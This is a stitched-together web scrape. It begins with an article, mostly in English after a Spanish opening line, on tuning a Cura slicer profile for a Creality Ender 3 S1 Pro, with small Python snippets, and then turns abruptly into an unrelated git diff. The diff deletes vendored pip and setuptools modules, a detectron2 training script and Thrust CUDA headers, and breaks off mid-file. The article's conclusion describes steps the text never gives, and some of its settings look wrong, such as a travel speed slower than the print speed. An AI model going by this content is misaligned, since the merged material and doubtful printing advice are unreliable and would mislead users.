
      Para personalizar y optimizar tu perfil de Cura para tu Creality Ender 3 S1 Pro, sigue estos pasos:

      -

      -
        -
1. Open Cura and select the profile you want to customize.
2. Click on the "Custom" tab on the right side of the screen. You will see a list of categories and settings you can change.
3. Click on the category you want to modify, for example "Quality", "Shell", or "Infill".
4. Click on the setting you want to change, for example "Layer Height", "Line Width", or "Infill Density".
5. Use the slider or the input box to adjust the value of the setting. For example, you can increase or decrease the layer height by moving the slider or typing a number.
6. Repeat steps 3 to 5 for any other settings you want to change.
7. Click "Slice" to see how your changes affect print time and material usage.
8. Click "Preview" to see how your changes affect print quality and appearance.
9. If you are happy with the results, click "Save to File" or "Print via USB" to export or print your model.
10. If you are not happy with the results, go back to step 3 and try different values until you get the result you want.
      -

To help you customize and optimize your Cura profile for your Creality Ender 3 S1 Pro, here are some tips and explanations for some of the most important settings:

      -

Layer height and line width

      -

Layer height and line width control the resolution and detail of your prints. Layer height is the thickness of each layer the printer lays down. Line width is the width of each line the printer extrudes. These settings affect how smooth and detailed your prints look, as well as how long they take to print and how much material they use.

      - -

A good rule of thumb is to use a layer height of 25% to 50% of the nozzle diameter. For example, with a 0.4 mm nozzle you can use a layer height of 0.1 mm to 0.2 mm. You can also use a line width equal to or slightly larger than the nozzle diameter. For example, with a 0.4 mm nozzle you can use a line width of 0.4 mm to 0.5 mm.
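To make that arithmetic concrete, here is a minimal Python sketch that turns a nozzle diameter into the suggested starting ranges. The function name and the percentages are only the rule-of-thumb values quoted above, not anything defined by Cura itself.

def starting_ranges(nozzle_mm):
    # Rule of thumb from the article: layer height 25-50% of the nozzle
    # diameter, line width 100-125% of the nozzle diameter.
    return {
        "layer_height_mm": (round(0.25 * nozzle_mm, 2), round(0.50 * nozzle_mm, 2)),
        "line_width_mm": (round(1.00 * nozzle_mm, 2), round(1.25 * nozzle_mm, 2)),
    }

print(starting_ranges(0.4))
# {'layer_height_mm': (0.1, 0.2), 'line_width_mm': (0.4, 0.5)}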

      -

Infill and support

      -

The infill and support settings control the strength and weight of your prints. Infill is the pattern and density of the material that fills the inside of your model. Support is the structure that holds up the overhangs and bridges of your model. These settings affect how strong and heavy your prints are, how much material they use, and how easy the supports are to remove.

      -

The optimal values for these settings depend on your model and your preferences. In general, higher values give stronger and heavier prints, but also more material usage and harder support removal. Lower values give weaker and lighter prints, but also less material usage and easier removal. Choose a balance between strength and weight that suits your needs.

      -

A good rule of thumb is to use an infill density of 10% to 20% for most models. You can also use different infill patterns for different effects: grid or triangles for general strength, gyroid or cubic for flexibility, honeycomb or stars for aesthetics, and so on. Use support only where it is needed, for overhangs steeper than 45 degrees or bridges longer than 5 mm. You can also use different support types for different effects: lines or zigzag for easy removal, tree or concentric for stability, and so on.
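As a small illustration of the 45-degree / 5 mm rule above, here is a hedged Python sketch. The threshold values are simply the ones quoted in this article, and the function is purely illustrative; it is not part of Cura.

def needs_support(overhang_deg, bridge_mm):
    # Article rule of thumb: add support for overhangs steeper than 45
    # degrees or bridges longer than 5 mm.
    return overhang_deg > 45.0 or bridge_mm > 5.0

print(needs_support(overhang_deg=30.0, bridge_mm=2.0))  # False
print(needs_support(overhang_deg=60.0, bridge_mm=0.0))  # True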

      -

Temperature and speed

      - -

The optimal values for these settings depend on your filament type and quality. In general, higher temperatures give better adhesion and flow, but also more stringing and oozing. Lower temperatures give less stringing and oozing, but also more warping and cracking. Higher speeds give faster prints, but also more errors and vibration. Lower speeds give more accurate prints, but also longer print times and higher energy use. Choose a balance between quality and throughput that suits your filament.

      -

A good rule of thumb is to use the temperature range recommended for your filament type and brand. You can find this information on the filament spool or on the manufacturer's website. For example, PLA generally prints well at 190°C to 220°C for the nozzle and 50°C to 60°C for the bed. You can also use the speed range recommended for your printer model and firmware, which you can find in the printer manual or on the manufacturer's website. For example, the Creality Ender 3 S1 Pro generally prints well at 40 mm/s to 80 mm/s for print speed and 20 mm/s to 40 mm/s for travel speed.
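The snippet below simply restates the ranges quoted above as a Python dictionary so they can be dropped into a script or notebook. These are starting points for PLA on this printer as given in the article, not values taken from an official Cura or Creality profile.

# Illustrative starting points taken from the ranges quoted above
# (PLA on an Ender 3 S1 Pro); not an official Cura or Creality profile.
pla_starting_point = {
    "nozzle_temp_c": (190, 220),
    "bed_temp_c": (50, 60),
    "print_speed_mm_s": (40, 80),
    "travel_speed_mm_s": (20, 40),
}

def midpoint(bounds):
    low, high = bounds
    return (low + high) / 2

print({name: midpoint(bounds) for name, bounds in pla_starting_point.items()})
# {'nozzle_temp_c': 205.0, 'bed_temp_c': 55.0, 'print_speed_mm_s': 60.0, 'travel_speed_mm_s': 30.0}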

      -

Retraction and coasting

      -

The retraction and coasting settings control the extrusion and flow of your filament. Retraction is the action of pulling the filament back from the nozzle while the printer moves between different parts of the model. Coasting is the action of stopping extrusion just before the end of a line or a layer. These settings affect how much stringing and oozing your prints show, as well as how smooth and consistent they are.

      - -

A good rule of thumb is to use a retraction distance of 2 to 4 times the nozzle diameter and a retraction speed of 20 to 40 mm/s. For example, with a 0.4 mm nozzle you can use a retraction distance of 0.8 mm to 1.6 mm and a retraction speed of 20 mm/s to 40 mm/s. You can also use a coasting volume close to the nozzle diameter cubed. For example, with a 0.4 mm nozzle you can use a coasting volume of 0.064 mm³ to 0.1 mm³.
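Here is the same rule of thumb as a tiny Python sketch. The multipliers (2-4 times the nozzle diameter, nozzle diameter cubed) come straight from the paragraph above and are only a starting point, not an official profile value.

def retraction_starting_point(nozzle_mm):
    # Rule of thumb from the article: distance 2-4x the nozzle diameter,
    # speed 20-40 mm/s, coasting volume roughly the nozzle diameter cubed.
    return {
        "retraction_distance_mm": (2 * nozzle_mm, 4 * nozzle_mm),
        "retraction_speed_mm_s": (20, 40),
        "coasting_volume_mm3": round(nozzle_mm ** 3, 3),
    }

print(retraction_starting_point(0.4))
# {'retraction_distance_mm': (0.8, 1.6), 'retraction_speed_mm_s': (20, 40), 'coasting_volume_mm3': 0.064}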

      -

Cooling and fan speed

      -

The cooling and fan speed settings control the temperature and airflow of your prints. Cooling is the action of blowing air over your prints so they solidify faster. Fan speed is the speed at which the cooling fan spins and blows air. These settings affect how well your prints solidify, how much they warp and crack, how smooth and glossy they are, and how fast they print.

      -

The optimal values for these settings depend on your filament type and quality. In general, higher cooling values give better solidification and smoother surfaces, but with high-temperature filaments they can also cause more warping and cracking. Lower cooling values reduce warping and cracking, but give less solidification and smoothness. Choose a cooling level that suits your filament.

      -

A good rule of thumb is to use a cooling fan speed of 100% for PLA and other low-temperature filaments, and a cooling fan speed of 0% to 50% for ABS and other high-temperature filaments. You can also use different fan speeds for different layers of your print. For example, you can use a lower fan speed for the first layer to improve bed adhesion, and a higher fan speed for the top layers to improve surface quality.
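A minimal sketch of that material- and layer-dependent rule, assuming only the percentages quoted above. Cura exposes this through its own fan-speed settings, so the function below is just an illustration of the rule, not an interface to the slicer.

def fan_speed_percent(material, layer):
    # Rule of thumb from the article: 100% fan for PLA-like filaments,
    # up to 50% for ABS-like filaments, and a lower value on layer 1
    # (0% here, purely as an example) to help bed adhesion.
    base = 100 if material.upper() == "PLA" else 50
    return 0 if layer == 1 else base

print(fan_speed_percent("PLA", layer=1))   # 0
print(fan_speed_percent("PLA", layer=10))  # 100
print(fan_speed_percent("ABS", layer=10))  # 50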

      -

How to export and save your Cura profile for future use

      - -

To export and save your Cura profile for future use, follow these steps:

      -
        -
1. Open Cura and select the profile you want to export.
2. Go to "Preferences" > "Profiles".
3. Select the profile you want to export and click "Export".
4. Choose a name and location for your profile file. It should have a .curaprofile extension.
5. Click "Save" to export your profile as a file.
6. You can now keep the profile file on your computer or in cloud storage, or share it with other users.
      -

To import and use your saved profile in the future, follow these steps:

      -
        -
1. Open Cura and go to "Preferences" > "Profiles".
2. Click "Import" and select the profile file you saved.
3. Cura will import the profile and add it to your list of profiles.
4. Select the imported profile and click "Activate".
5. Cura will load the profile for your printer. You can use it as-is or modify it as needed.
      -

Exporting and saving your Cura profile can save you time and effort, and it makes your prints more consistent and repeatable.

      -

How to load your Cura profile and start printing with your Creality Ender 3 S1 Pro

      -

Once you have exported and saved your Cura profile, you are ready to load it and start printing with your Creality Ender 3 S1 Pro. To do this, follow these steps:

      -
        -
1. Open Cura and select the profile you want to use.
2. Load your 3D model into Cura by clicking "Open File" or by dragging and dropping it onto the build plate area.
3. Cura will slice your model according to your profile settings. You can see the estimated print time and material usage in the bottom-right corner of the screen.
4. When you are ready to print, click "Save to File" or "Print via USB", depending on how you want to connect your printer to your computer.
5. If you choose "Save to File", Cura will export your sliced model as a .gcode file. Save this file to your computer or to a removable storage device such as an SD card or USB stick, then insert the storage device into your printer and select the file from the printer's LCD menu (see the sketch after this list for a quick way to inspect the exported file).
6. If you choose "Print via USB", Cura will send your sliced model directly to your printer over a USB cable. Make sure your printer is connected to your computer and powered on before printing, then click "Print via USB" in Cura and follow the on-screen instructions.
      -
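As referenced in step 5 above, here is a small, hedged Python sketch that reads the comment header Cura typically writes at the top of an exported .gcode file (lines such as ";TIME:" and ";Filament used:"). The exact header fields can vary between Cura versions, and the file name used below is only an example.

def summarize_gcode_header(path, max_lines=50):
    # Collect the ";KEY:VALUE" comment lines that Cura usually writes at
    # the top of a sliced file, e.g. ";TIME:3817" or ";Filament used: 1.5m".
    info = {}
    with open(path, "r", encoding="utf-8", errors="ignore") as handle:
        for _, line in zip(range(max_lines), handle):
            if line.startswith(";") and ":" in line:
                key, _, value = line[1:].partition(":")
                info[key.strip()] = value.strip()
    return info

# Hypothetical file name, just for illustration:
# print(summarize_gcode_header("CE3S1PRO_model.gcode").get("TIME"))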

Congratulations, you have successfully loaded your Cura profile and started printing with your Creality Ender 3 S1 Pro. Enjoy your prints!

      -

Conclusion

      -

In this article, we have explained how to find and download a Cura profile for your Creality Ender 3 S1 Pro, how to customize and optimize the most important settings, and how to export, save, and load your profile so you can reuse it for future prints.

      -
      -
      \ No newline at end of file diff --git a/spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/pygments/__main__.py b/spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/pygments/__main__.py deleted file mode 100644 index 90cafd93426f6fb2e8ad57b140b7ae163a67a4a4..0000000000000000000000000000000000000000 --- a/spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/pygments/__main__.py +++ /dev/null @@ -1,17 +0,0 @@ -""" - pygments.__main__ - ~~~~~~~~~~~~~~~~~ - - Main entry point for ``python -m pygments``. - - :copyright: Copyright 2006-2022 by the Pygments team, see AUTHORS. - :license: BSD, see LICENSE for details. -""" - -import sys -from pip._vendor.pygments.cmdline import main - -try: - sys.exit(main(sys.argv)) -except KeyboardInterrupt: - sys.exit(1) diff --git a/spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/resolvelib/reporters.py b/spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/resolvelib/reporters.py deleted file mode 100644 index 688b5e10d8608fdb324c5df0ec3d9f4aa720de0e..0000000000000000000000000000000000000000 --- a/spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/resolvelib/reporters.py +++ /dev/null @@ -1,43 +0,0 @@ -class BaseReporter(object): - """Delegate class to provider progress reporting for the resolver.""" - - def starting(self): - """Called before the resolution actually starts.""" - - def starting_round(self, index): - """Called before each round of resolution starts. - - The index is zero-based. - """ - - def ending_round(self, index, state): - """Called before each round of resolution ends. - - This is NOT called if the resolution ends at this round. Use `ending` - if you want to report finalization. The index is zero-based. - """ - - def ending(self, state): - """Called before the resolution ends successfully.""" - - def adding_requirement(self, requirement, parent): - """Called when adding a new requirement into the resolve criteria. - - :param requirement: The additional requirement to be applied to filter - the available candidaites. - :param parent: The candidate that requires ``requirement`` as a - dependency, or None if ``requirement`` is one of the root - requirements passed in from ``Resolver.resolve()``. - """ - - def resolving_conflicts(self, causes): - """Called when starting to attempt requirement conflict resolution. - - :param causes: The information on the collision that caused the backtracking. 
- """ - - def rejecting_candidate(self, criterion, candidate): - """Called when rejecting a candidate during backtracking.""" - - def pinning(self, candidate): - """Called when adding a candidate to the potential solution.""" diff --git a/spaces/Big-Web/MMSD/env/Lib/site-packages/pkg_resources/_vendor/importlib_resources/__init__.py b/spaces/Big-Web/MMSD/env/Lib/site-packages/pkg_resources/_vendor/importlib_resources/__init__.py deleted file mode 100644 index 34e3a9950cc557879af8d797f9382b18a870fb56..0000000000000000000000000000000000000000 --- a/spaces/Big-Web/MMSD/env/Lib/site-packages/pkg_resources/_vendor/importlib_resources/__init__.py +++ /dev/null @@ -1,36 +0,0 @@ -"""Read resources contained within a package.""" - -from ._common import ( - as_file, - files, - Package, -) - -from ._legacy import ( - contents, - open_binary, - read_binary, - open_text, - read_text, - is_resource, - path, - Resource, -) - -from .abc import ResourceReader - - -__all__ = [ - 'Package', - 'Resource', - 'ResourceReader', - 'as_file', - 'contents', - 'files', - 'is_resource', - 'open_binary', - 'open_text', - 'path', - 'read_binary', - 'read_text', -] diff --git a/spaces/Big-Web/MMSD/env/Lib/site-packages/setuptools/_distutils/py38compat.py b/spaces/Big-Web/MMSD/env/Lib/site-packages/setuptools/_distutils/py38compat.py deleted file mode 100644 index 59224e71e50c49e5f9f6f925837597c035a8ab7f..0000000000000000000000000000000000000000 --- a/spaces/Big-Web/MMSD/env/Lib/site-packages/setuptools/_distutils/py38compat.py +++ /dev/null @@ -1,8 +0,0 @@ -def aix_platform(osname, version, release): - try: - import _aix_support - - return _aix_support.aix_platform() - except ImportError: - pass - return "{}-{}.{}".format(osname, version, release) diff --git a/spaces/Big-Web/MMSD/env/Lib/site-packages/setuptools/extension.py b/spaces/Big-Web/MMSD/env/Lib/site-packages/setuptools/extension.py deleted file mode 100644 index 58c023f6b4479c631f382e5062932793d2bee26b..0000000000000000000000000000000000000000 --- a/spaces/Big-Web/MMSD/env/Lib/site-packages/setuptools/extension.py +++ /dev/null @@ -1,148 +0,0 @@ -import re -import functools -import distutils.core -import distutils.errors -import distutils.extension - -from .monkey import get_unpatched - - -def _have_cython(): - """ - Return True if Cython can be imported. - """ - cython_impl = 'Cython.Distutils.build_ext' - try: - # from (cython_impl) import build_ext - __import__(cython_impl, fromlist=['build_ext']).build_ext - return True - except Exception: - pass - return False - - -# for compatibility -have_pyrex = _have_cython - -_Extension = get_unpatched(distutils.core.Extension) - - -class Extension(_Extension): - """ - Describes a single extension module. - - This means that all source files will be compiled into a single binary file - ``.`` (with ```` derived from ``name`` and - ```` defined by one of the values in - ``importlib.machinery.EXTENSION_SUFFIXES``). - - In the case ``.pyx`` files are passed as ``sources and`` ``Cython`` is **not** - installed in the build environment, ``setuptools`` may also try to look for the - equivalent ``.cpp`` or ``.c`` files. - - :arg str name: - the full name of the extension, including any packages -- ie. - *not* a filename or pathname, but Python dotted name - - :arg list[str] sources: - list of source filenames, relative to the distribution root - (where the setup script lives), in Unix form (slash-separated) - for portability. 
Source files may be C, C++, SWIG (.i), - platform-specific resource files, or whatever else is recognized - by the "build_ext" command as source for a Python extension. - - :keyword list[str] include_dirs: - list of directories to search for C/C++ header files (in Unix - form for portability) - - :keyword list[tuple[str, str|None]] define_macros: - list of macros to define; each macro is defined using a 2-tuple: - the first item corresponding to the name of the macro and the second - item either a string with its value or None to - define it without a particular value (equivalent of "#define - FOO" in source or -DFOO on Unix C compiler command line) - - :keyword list[str] undef_macros: - list of macros to undefine explicitly - - :keyword list[str] library_dirs: - list of directories to search for C/C++ libraries at link time - - :keyword list[str] libraries: - list of library names (not filenames or paths) to link against - - :keyword list[str] runtime_library_dirs: - list of directories to search for C/C++ libraries at run time - (for shared extensions, this is when the extension is loaded). - Setting this will cause an exception during build on Windows - platforms. - - :keyword list[str] extra_objects: - list of extra files to link with (eg. object files not implied - by 'sources', static library that must be explicitly specified, - binary resource files, etc.) - - :keyword list[str] extra_compile_args: - any extra platform- and compiler-specific information to use - when compiling the source files in 'sources'. For platforms and - compilers where "command line" makes sense, this is typically a - list of command-line arguments, but for other platforms it could - be anything. - - :keyword list[str] extra_link_args: - any extra platform- and compiler-specific information to use - when linking object files together to create the extension (or - to create a new static Python interpreter). Similar - interpretation as for 'extra_compile_args'. - - :keyword list[str] export_symbols: - list of symbols to be exported from a shared extension. Not - used on all platforms, and not generally necessary for Python - extensions, which typically export exactly one symbol: "init" + - extension_name. - - :keyword list[str] swig_opts: - any extra options to pass to SWIG if a source file has the .i - extension. - - :keyword list[str] depends: - list of files that the extension depends on - - :keyword str language: - extension language (i.e. "c", "c++", "objc"). Will be detected - from the source extensions if not provided. - - :keyword bool optional: - specifies that a build failure in the extension should not abort the - build process, but simply not install the failing extension. - - :keyword bool py_limited_api: - opt-in flag for the usage of :doc:`Python's limited API `. - - :raises setuptools.errors.PlatformError: if 'runtime_library_dirs' is - specified on Windows. (since v63) - """ - - def __init__(self, name, sources, *args, **kw): - # The *args is needed for compatibility as calls may use positional - # arguments. py_limited_api may be set only via keyword. - self.py_limited_api = kw.pop("py_limited_api", False) - super().__init__(name, sources, *args, **kw) - - def _convert_pyx_sources_to_lang(self): - """ - Replace sources with .pyx extensions to sources with the target - language extension. This mechanism allows language authors to supply - pre-converted sources but to prefer the .pyx sources. 
- """ - if _have_cython(): - # the build has Cython, so allow it to compile the .pyx files - return - lang = self.language or '' - target_ext = '.cpp' if lang.lower() == 'c++' else '.c' - sub = functools.partial(re.sub, '.pyx$', target_ext) - self.sources = list(map(sub, self.sources)) - - -class Library(Extension): - """Just like a regular Extension, but built as a library instead""" diff --git a/spaces/CVPR/Dual-Key_Backdoor_Attacks/datagen/grid-feats-vqa/train_net.py b/spaces/CVPR/Dual-Key_Backdoor_Attacks/datagen/grid-feats-vqa/train_net.py deleted file mode 100644 index 8c7abd64c7a2b54ba6e29b9d14c83a4432e566af..0000000000000000000000000000000000000000 --- a/spaces/CVPR/Dual-Key_Backdoor_Attacks/datagen/grid-feats-vqa/train_net.py +++ /dev/null @@ -1,128 +0,0 @@ -#!/usr/bin/env python3 -# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved - -""" -Grid features pre-training script. - -This script is a simplified version of the training script in detectron2/tools. -""" - -import os -import time -import torch - -import detectron2.utils.comm as comm -from detectron2.checkpoint import DetectionCheckpointer -from detectron2.config import get_cfg -from detectron2.data import MetadataCatalog -from detectron2.engine import DefaultTrainer, default_argument_parser, default_setup, launch -from detectron2.evaluation import COCOEvaluator, DatasetEvaluators, verify_results - -from grid_feats import ( - add_attribute_config, - build_detection_train_loader_with_attributes, - build_detection_test_loader_with_attributes, -) - - -class Trainer(DefaultTrainer): - """ - A trainer for visual genome dataset. - """ - def __init__(self, cfg): - super().__init__(cfg) - self.rpn_box_lw = cfg.MODEL.RPN.BBOX_LOSS_WEIGHT - self.rcnn_box_lw = cfg.MODEL.ROI_BOX_HEAD.BBOX_LOSS_WEIGHT - - @classmethod - def build_evaluator(cls, cfg, dataset_name, output_folder=None): - if output_folder is None: - output_folder = os.path.join(cfg.OUTPUT_DIR, "inference") - evaluator_list = [] - evaluator_type = MetadataCatalog.get(dataset_name).evaluator_type - if evaluator_type == "coco": - return COCOEvaluator(dataset_name, cfg, True, output_folder) - if len(evaluator_list) == 0: - raise NotImplementedError( - "no Evaluator for the dataset {} with the type {}".format( - dataset_name, evaluator_type - ) - ) - if len(evaluator_list) == 1: - return evaluator_list[0] - return DatasetEvaluators(evaluator_list) - - @classmethod - def build_train_loader(cls, cfg): - return build_detection_train_loader_with_attributes(cfg) - - @classmethod - def build_test_loader(cls, cfg, dataset_name): - return build_detection_test_loader_with_attributes(cfg, dataset_name) - - def run_step(self): - """ - !!Hack!! for the run_step method in SimpleTrainer to adjust the loss - """ - assert self.model.training, "[Trainer] model was changed to eval mode!" - start = time.perf_counter() - data = next(self._data_loader_iter) - data_time = time.perf_counter() - start - loss_dict = self.model(data) - # RPN box loss: - loss_dict["loss_rpn_loc"] *= self.rpn_box_lw - # R-CNN box loss: - loss_dict["loss_box_reg"] *= self.rcnn_box_lw - losses = sum(loss_dict.values()) - self._detect_anomaly(losses, loss_dict) - - metrics_dict = loss_dict - metrics_dict["data_time"] = data_time - self._write_metrics(metrics_dict) - self.optimizer.zero_grad() - losses.backward() - self.optimizer.step() - - -def setup(args): - """ - Create configs and perform basic setups. 
- """ - cfg = get_cfg() - add_attribute_config(cfg) - cfg.merge_from_file(args.config_file) - cfg.merge_from_list(args.opts) - cfg.freeze() - default_setup(cfg, args) - return cfg - - -def main(args): - cfg = setup(args) - - if args.eval_only: - model = Trainer.build_model(cfg) - DetectionCheckpointer(model, save_dir=cfg.OUTPUT_DIR).resume_or_load( - cfg.MODEL.WEIGHTS, resume=args.resume - ) - res = Trainer.test(cfg, model) - if comm.is_main_process(): - verify_results(cfg, res) - return res - - trainer = Trainer(cfg) - trainer.resume_or_load(resume=args.resume) - return trainer.train() - - -if __name__ == "__main__": - args = default_argument_parser().parse_args() - print("Command Line Args:", args) - launch( - main, - args.num_gpus, - num_machines=args.num_machines, - machine_rank=args.machine_rank, - dist_url=args.dist_url, - args=(args,), - ) diff --git a/spaces/CVPR/DualStyleGAN/README.md b/spaces/CVPR/DualStyleGAN/README.md deleted file mode 100644 index c96dd2271d61c17cb1a51746a6834996351a5821..0000000000000000000000000000000000000000 --- a/spaces/CVPR/DualStyleGAN/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Portrait Style Transfer with DualStyleGAN -emoji: 😻 -colorFrom: purple -colorTo: red -sdk: gradio -sdk_version: 3.36.1 -app_file: app.py -pinned: false -suggested_hardware: t4-small ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces#reference diff --git a/spaces/CVPR/LIVE/thrust/thrust/detail/complex/csinhf.h b/spaces/CVPR/LIVE/thrust/thrust/detail/complex/csinhf.h deleted file mode 100644 index bf4fb0816478f9882fdbe9082b8f4c266d713206..0000000000000000000000000000000000000000 --- a/spaces/CVPR/LIVE/thrust/thrust/detail/complex/csinhf.h +++ /dev/null @@ -1,142 +0,0 @@ -/* - * Copyright 2008-2013 NVIDIA Corporation - * Copyright 2013 Filipe RNC Maia - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -/*- - * Copyright (c) 2005 Bruce D. Evans and Steven G. Kargl - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions - * are met: - * 1. Redistributions of source code must retain the above copyright - * notice unmodified, this list of conditions, and the following - * disclaimer. - * 2. Redistributions in binary form must reproduce the above copyright - * notice, this list of conditions and the following disclaimer in the - * documentation and/or other materials provided with the distribution. - * - * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR - * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES - * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 
- * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, - * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT - * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, - * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY - * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT - * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF - * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ - -/* adapted from FreeBSD: - * lib/msun/src/s_csinhf.c - */ - - -#pragma once - -#include -#include - -namespace thrust{ -namespace detail{ -namespace complex{ - -using thrust::complex; - -__host__ __device__ inline -complex csinhf(const complex& z){ - - float x, y, h; - uint32_t hx, hy, ix, iy; - - const float huge = 1.70141183460469231731687303716e+38; //0x1p127; - - x = z.real(); - y = z.imag(); - - get_float_word(hx, x); - get_float_word(hy, y); - - ix = 0x7fffffff & hx; - iy = 0x7fffffff & hy; - - if (ix < 0x7f800000 && iy < 0x7f800000) { - if (iy == 0) - return (complex(sinhf(x), y)); - if (ix < 0x41100000) /* small x: normal case */ - return (complex(sinhf(x) * cosf(y), coshf(x) * sinf(y))); - - /* |x| >= 9, so cosh(x) ~= exp(|x|) */ - if (ix < 0x42b17218) { - /* x < 88.7: expf(|x|) won't overflow */ - h = expf(fabsf(x)) * 0.5f; - return (complex(copysignf(h, x) * cosf(y), h * sinf(y))); - } else if (ix < 0x4340b1e7) { - /* x < 192.7: scale to avoid overflow */ - complex z_ = ldexp_cexpf(complex(fabsf(x), y), -1); - return (complex(z_.real() * copysignf(1.0f, x), z_.imag())); - } else { - /* x >= 192.7: the result always overflows */ - h = huge * x; - return (complex(h * cosf(y), h * h * sinf(y))); - } - } - - if (ix == 0 && iy >= 0x7f800000) - return (complex(copysignf(0, x * (y - y)), y - y)); - - if (iy == 0 && ix >= 0x7f800000) { - if ((hx & 0x7fffff) == 0) - return (complex(x, y)); - return (complex(x, copysignf(0.0f, y))); - } - - if (ix < 0x7f800000 && iy >= 0x7f800000) - return (complex(y - y, x * (y - y))); - - if (ix >= 0x7f800000 && (hx & 0x7fffff) == 0) { - if (iy >= 0x7f800000) - return (complex(x * x, x * (y - y))); - return (complex(x * cosf(y), infinity() * sinf(y))); - } - - return (complex((x * x) * (y - y), (x + x) * (y - y))); -} - -__host__ __device__ inline -complex csinf(complex z){ - z = csinhf(complex(-z.imag(), z.real())); - return (complex(z.imag(), -z.real())); -} - -} // namespace complex - -} // namespace detail - -template <> -__host__ __device__ -inline complex sin(const complex& z){ - return detail::complex::csinf(z); -} - -template <> -__host__ __device__ -inline complex sinh(const complex& z){ - return detail::complex::csinhf(z); -} - -} // namespace thrust diff --git a/spaces/CVPR/LIVE/thrust/thrust/detail/preprocessor.h b/spaces/CVPR/LIVE/thrust/thrust/detail/preprocessor.h deleted file mode 100644 index 0e9943b76f84ed5481364aa1fce7d35970d26097..0000000000000000000000000000000000000000 --- a/spaces/CVPR/LIVE/thrust/thrust/detail/preprocessor.h +++ /dev/null @@ -1,1182 +0,0 @@ -// Copyright (c) 2017-2018 NVIDIA Corporation -// Copyright (c) 2014-2018 Bryce Adelstein Lelbach -// Copyright (c) 2001-2015 Housemarque Oy (housemarque.com) -// Copyright (c) 2007-2015 Hartmut Kaiser -// Copyright (c) 2002 Peter Dimov and Multi Media Ltd -// (`THRUST_CURRENT_FUNCTION`) -// -// Distributed under the Boost Software License v1.0 (boost.org/LICENSE_1_0.txt) - -#pragma once - 
-/////////////////////////////////////////////////////////////////////////////// - -/// \def THRUST_PP_STRINGIZE(expr) -/// \brief Stringizes the expression \a expr. -/// -/// \par Example: -/// -/// \code -/// #include -/// #include -/// -/// int main() -/// { -/// std::cout << THRUST_PP_STRINGIZE(foo) << "\n"; -/// } -/// \endcode -/// -/// The above code expands to: -/// -/// \code -/// #include -/// #include -/// -/// int main() -/// { -/// std::cout << "foo" << "\n"; -/// } -/// \endcode -/// -#define THRUST_PP_STRINGIZE(expr) THRUST_PP_STRINGIZE_IMPL0(expr) -#define THRUST_PP_STRINGIZE_IMPL0(expr) #expr - -/////////////////////////////////////////////////////////////////////////////// - -/// \def THRUST_PP_CAT2(a, b) -/// \brief Concatenates the tokens \a a and \b b. -/// -/// \par Example: -/// -/// \code -/// #include -/// #include -/// -/// int main() -/// { -/// std::cout << THRUST_PP_CAT2(1, THRUST_PP_CAT2(2, 3)) << "\n"; -/// } -/// \endcode -/// -/// The above code expands to: -/// -/// \code -/// #include -/// #include -/// -/// int main() -/// { -/// std::cout << 123 << "\n"; -/// } -/// \endcode -/// -#define THRUST_PP_CAT2(a, b) THRUST_PP_CAT2_IMPL0(a, b) - -#if defined(_MSC_VER) \ - && (defined(__EDG__) || defined(__EDG_VERSION__)) \ - && (defined(__INTELLISENSE__) || __EDG_VERSION__ >= 308) - #define THRUST_PP_CAT2_IMPL0(a, b) THRUST_PP_CAT2_IMPL1(~, a ## b) - #define THRUST_PP_CAT2_IMPL1(p, res) res -#else - #define THRUST_PP_CAT2_IMPL0(a, b) a ## b -#endif - -#define THRUST_PP_CAT3(a, b, c) \ - THRUST_PP_CAT2(a, \ - THRUST_PP_CAT2(b, c)) \ - /**/ - -#define THRUST_PP_CAT4(a, b, c, d) \ - THRUST_PP_CAT2(a, \ - THRUST_PP_CAT2(b, \ - THRUST_PP_CAT2(c, d))) \ - /**/ - -#define THRUST_PP_CAT5(a, b, c, d, e) \ - THRUST_PP_CAT2(a, \ - THRUST_PP_CAT2(b, \ - THRUST_PP_CAT2(c, \ - THRUST_PP_CAT2(d, e)))) \ - /**/ - -/////////////////////////////////////////////////////////////////////////////// - -/// \def THRUST_PP_EXPAND(x) -/// \brief Performs macro expansion on \a x. -/// -/// \par Example: -/// -/// \code -/// #include -/// #include -/// -/// #define FOO_BAR() "foo_bar" -/// #define BUZZ() THRUST_PP_EXPAND(THRUST_PP_CAT2(FOO_, BAR)()) -/// -/// int main() -/// { -/// std::cout << BUZZ() << "\n"; -/// } -/// \endcode -/// -/// The above code expands to: -/// -/// \code -/// #include -/// #include -/// -/// int main() -/// { -/// std::cout << "foo_bar" << "\n"; -/// } -/// \endcode -/// -#define THRUST_PP_EXPAND(x) THRUST_PP_EXPAND_IMPL0(x) -#define THRUST_PP_EXPAND_IMPL0(x) x - -#define THRUST_PP_EXPAND_ARGS(...) 